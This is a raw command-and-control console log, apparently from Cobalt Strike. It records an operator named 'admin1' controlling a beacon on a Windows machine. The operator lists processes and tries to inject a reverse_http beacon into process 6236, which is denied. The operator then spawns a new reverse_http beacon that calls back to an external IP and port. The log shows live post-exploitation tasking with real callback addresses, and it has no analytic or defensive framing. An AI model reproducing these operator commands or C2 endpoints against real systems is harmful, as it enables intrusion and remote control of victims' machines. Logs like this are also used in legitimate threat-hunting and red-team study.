11/19 05:13:01 UTC [metadata] 23.158.104.160 <- 192.168.1.13; computer: NOT-FOUND-404; user: kaeiy *; process: artifact_x64.exe; pid: 18000; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
11/19 05:12:54 UTC [task] <T1029> Tasked beacon to sleep for 30s (30% jitter)
11/19 05:12:54 UTC [note] Bid: 1188160174  NT: 6.2
11/19 05:12:54 UTC [task] <T1029> Tasked beacon to become interactive
11/19 05:13:55 UTC [checkin] host called home, sent: 32 bytes
11/19 05:53:36 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:53:40 UTC [checkin] host called home, sent: 12 bytes
11/19 05:54:01 UTC [input] <admin1> inject 6236 x64 aa
11/19 05:54:01 UTC [task] <T1055> Tasked beacon to inject windows/beacon_http/reverse_http (47.93.172.190:45236) into 6236 (x64)
11/19 05:54:06 UTC [checkin] host called home, sent: 303275 bytes
11/19 05:54:11 UTC [error] could not open process 6236: 5 - ERROR_ACCESS_DENIED
11/19 05:54:31 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:54:31 UTC [checkin] host called home, sent: 12 bytes
11/19 05:54:38 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:54:40 UTC [checkin] host called home, sent: 12 bytes
11/19 05:54:57 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:55:07 UTC [checkin] host called home, sent: 12 bytes
11/19 05:55:50 UTC [input] <admin1> spawn
11/19 05:55:53 UTC [task] <T1093> Tasked beacon to spawn (x64) windows/beacon_http/reverse_http (47.93.172.190:45236)
11/19 05:55:53 UTC [checkin] host called home, sent: 303267 bytes
11/19 05:57:47 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:57:47 UTC [checkin] host called home, sent: 12 bytes
11/19 05:57:49 UTC [task] <> Tasked beacon to list processes (from Process Browser)
11/19 05:57:50 UTC [checkin] host called home, sent: 12 bytes
